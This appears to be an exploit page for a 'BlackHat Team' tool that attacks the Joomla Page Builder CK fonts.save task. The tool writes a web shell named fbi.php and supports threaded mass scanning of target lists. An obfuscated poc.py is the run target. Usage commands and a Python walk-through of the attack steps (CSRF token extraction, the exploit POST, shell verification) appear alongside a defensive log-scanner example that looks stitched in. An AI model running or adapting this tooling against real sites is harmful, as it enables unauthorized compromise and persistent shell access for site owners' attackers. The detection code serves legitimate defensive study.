## https://sploitus.com/exploit?id=9D8EF289-CD29-521C-A5DA-0E5AF14AF08F
# Page Builder CK - fonts.save RCE Probe
**BlackHat Team** proof-of-concept scanner for the Joomla **Page Builder CK** `fonts.save` vulnerability.
> **Author:** [@mrzblackhat](https://t.me/mrzblackhat)
> **Team:** BlackHat Team
> **Credits:** Peyman Siyahi · MR.PERSIA
---
## Overview
This tool probes Joomla sites running the vulnerable **com_pagebuilderck** component. It abuses the `fonts.save` task to pull a remote payload and writes a web shell under:
```
media/com_pagebuilderck/gfonts/fbi.php
```
RCE is confirmed when the uploaded shell responds with an HTML `<title>` containing **`Fbi Shell`**.
Supports **single-target** and **mass** scanning with threaded workers and instant hit saving.
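The indicators named above also give a defender something concrete to look for. The following is an added Python example, not part of the tool, that scans web-server access-log lines (combined format) for the two artifacts this page describes: a `POST` to `index.php` carrying `option=com_pagebuilderck&task=fonts.save` in the query string, and any request for a `.php` file under `media/com_pagebuilderck/gfonts/`, a directory that should only ever hold font files and CSS. The log lines are constructed for the example, not captured from a real server.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Indicators taken from this page: the font directory the shell lands in,
# and the component/task pair the exploit posts to.
GFONTS_DIR = "/media/com_pagebuilderck/gfonts/"
VULN_OPTION = "com_pagebuilderck"
VULN_TASK = "fonts.save"

# Pulls method and request target out of a combined-format log line.
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2025:10:00:00 +0000] "GET / HTTP/1.1" 200 5120 "-" "curl/8.0"',
    '203.0.113.5 - - [01/Jan/2025:10:00:01 +0000] '
    '"POST /index.php?option=com_pagebuilderck&task=fonts.save HTTP/1.1" 303 0 "-" "curl/8.0"',
    '203.0.113.5 - - [01/Jan/2025:10:00:02 +0000] '
    '"GET /media/com_pagebuilderck/gfonts/fbi.php HTTP/1.1" 200 310 "-" "curl/8.0"',
    '198.51.100.7 - - [01/Jan/2025:10:05:00 +0000] '
    '"GET /media/com_pagebuilderck/gfonts/font.css HTTP/1.1" 200 210 "-" "Mozilla/5.0"',
]


def classify_request(method: str, target: str) -> Optional[str]:
    """Return an indicator name if the request matches, else None."""
    parts = urlsplit(target)
    path = parts.path
    query = parse_qs(parts.query)

    # Any PHP file under the gfonts directory is a written shell candidate;
    # legitimate content there is fonts and CSS only.
    if path.startswith(GFONTS_DIR) and path.lower().endswith(".php"):
        return "php-under-gfonts"

    # The exploit's POST, when its parameters travel in the query string.
    if (method == "POST" and path.endswith("/index.php")
            and query.get("option") == [VULN_OPTION]
            and query.get("task") == [VULN_TASK]):
        return "fonts.save-post"
    return None


def scan_access_log(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (indicator, request target) for every matching log line."""
    hits = []
    for line in lines:
        m = REQ_RE.search(line)
        if not m:
            continue  # not a parseable request line
        reason = classify_request(m.group("method"), m.group("target"))
        if reason:
            hits.append((reason, m.group("target")))
    return hits


if __name__ == "__main__":
    for reason, target in scan_access_log(SAMPLE_LOG):
        print(f"{reason:18} {target}")
```

Two caveats. If the exploit sends `option`/`task` in the POST body rather than the query string, an access log shows only `POST /index.php` and the first indicator never fires; the second one (a `.php` request under `gfonts/`) does not depend on that. Independently of logs, listing `media/com_pagebuilderck/gfonts/` on the server for anything ending in `.php` is the quickest check for a shell that has already been written.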
---
## Requirements
- Python **3.10+**
- `requests`
- `urllib3`
```bash
pip install requests urllib3
```
---
## Usage
### Single target
```bash
python3 poc.py --url https://example.com --insecure
```
### Mass scan
```bash
python3 poc.py --mass targets.txt --insecure --threads 20 --timeout 12
```
`targets.txt` - one URL per line; anything after a `#` is treated as a comment and ignored.
### Options
| Flag | Description |
|------|-------------|
| `--url URL` | Scan a single target |
| `--mass FILE` | Scan targets from a file |
| `--insecure` | Skip TLS certificate verification |
| `--threads N` | Worker threads for mass mode (default: `20`) |
| `--timeout N` | HTTP timeout in seconds (default: `12`) |
| `--output FILE` | Save confirmed shell URLs (default: `hits.txt`) |
---
## Output
- **HIT** - shell uploaded and PHP executed; `<title>` contains `Fbi Shell`
- **PART** - file written but PHP not executed
- **MISS** - exploit not confirmed
Confirmed shell URLs are appended to the output file immediately.
---
## Project files
| File | Description |
|------|-------------|
| `poc.py` | Obfuscated release build (run this) |
| `hits.txt` | Default output for confirmed shells |
### Rebuild after editing source
```bash
python3 _build_obf.py
```
`_build_obf.py` and the unobfuscated source it reads are not listed in the table above; read that source before running or rebuilding, because the obfuscated `poc.py` cannot be audited as shipped.
---
## How it works
1. Fetch homepage and extract Joomla CSRF token
2. `POST` to `index.php` with `option=com_pagebuilderck&task=fonts.save`
3. Remote `font.css` callback triggers shell write to `gfonts/fbi.php`
4. `GET` the shell path and verify the `<title>` contains `Fbi Shell`
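The four steps above, written out as an added Python example. This is not the project's `poc.py` (the release build is obfuscated, so nothing here is taken from it) and it never sends a request: it extracts the Joomla anti-CSRF token from constructed homepage HTML, builds the `fonts.save` request with only the fields this page documents (the field that carries the remote `font.css` URL is not described on the page and is deliberately not guessed), derives the expected shell URL, and maps a response on the shell path to HIT, PART or MISS using the rules from the Output section. The sample HTML and responses are constructed; treating a `200` whose body contains a literal `<?php` as PART is my assumption about what "file written but PHP not executed" looks like on the wire.

```python
import re
from typing import Optional, Tuple
from urllib.parse import urlencode, urljoin

SHELL_PATH = "media/com_pagebuilderck/gfonts/fbi.php"

# Joomla renders its anti-CSRF token as a hidden form input whose *name* is a
# 32-character hex string and whose value is "1"; the name is what gets posted.
TOKEN_RE = re.compile(r'<input[^>]*name="([0-9a-f]{32})"[^>]*value="1"', re.I)
TITLE_RE = re.compile(r"<title>(.*?)</title>", re.I | re.S)

# Constructed homepage fragment (not captured from a real site).
SAMPLE_HOMEPAGE = (
    '<html><head><title>Home</title></head><body>'
    '<form action="/index.php" method="post">'
    '<input type="hidden" name="0123456789abcdef0123456789abcdef" value="1">'
    '</form></body></html>'
)


def extract_csrf_token(html: str) -> Optional[str]:
    """Step 1: pull the Joomla token name out of the homepage HTML."""
    m = TOKEN_RE.search(html)
    return m.group(1) if m else None


def build_fonts_save_post(base_url: str, token: str) -> Tuple[str, str]:
    """Step 2: target URL and urlencoded body for the fonts.save task.

    Only the documented fields are set (option, task, CSRF token). The field
    naming the remote font.css payload is not given on the page, so it is
    left out rather than invented.
    """
    base = base_url.rstrip("/") + "/"
    body = {"option": "com_pagebuilderck", "task": "fonts.save", token: "1"}
    return urljoin(base, "index.php"), urlencode(body)


def shell_url(base_url: str) -> str:
    """Step 3/4: where the shell is expected if the callback fired."""
    return urljoin(base_url.rstrip("/") + "/", SHELL_PATH)


def classify(status: int, body: str) -> str:
    """Step 4: map the GET on the shell path to the tool's HIT/PART/MISS."""
    if status == 200:
        m = TITLE_RE.search(body)
        if m and "Fbi Shell" in m.group(1):
            return "HIT"    # PHP executed and rendered the shell's title
        if "<?php" in body:
            return "PART"   # assumption: file present but served as raw source
    return "MISS"


if __name__ == "__main__":
    token = extract_csrf_token(SAMPLE_HOMEPAGE)
    print("token:", token)
    if token:
        print(build_fonts_save_post("https://example.com", token))
    print("shell:", shell_url("https://example.com"))
    print(classify(200, "<html><head><title>Fbi Shell</title></head></html>"))
```

The token regex is strict on purpose: a site that serves no 32-hex hidden input on its homepage yields `None`, and a scanner should stop there rather than post without a token, since Joomla rejects the request anyway.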
---
## Disclaimer
This tool is provided for **authorized security research and penetration testing only**.
Unauthorized access to computer systems is illegal. The authors and **BlackHat Team** are not responsible for misuse. Only test systems you own or have explicit written permission to assess.
---
## Contact
- **Telegram:** [https://t.me/mrzblackhat](https://t.me/mrzblackhat)
- **Handle:** `@mrzblackhat`
**BlackHat Team** - Peyman Siyahi · MR.PERSIA
---
*Original research and tooling by [@mrzblackhat](https://t.me/mrzblackhat). Do not redistribute modified copies without attribution.*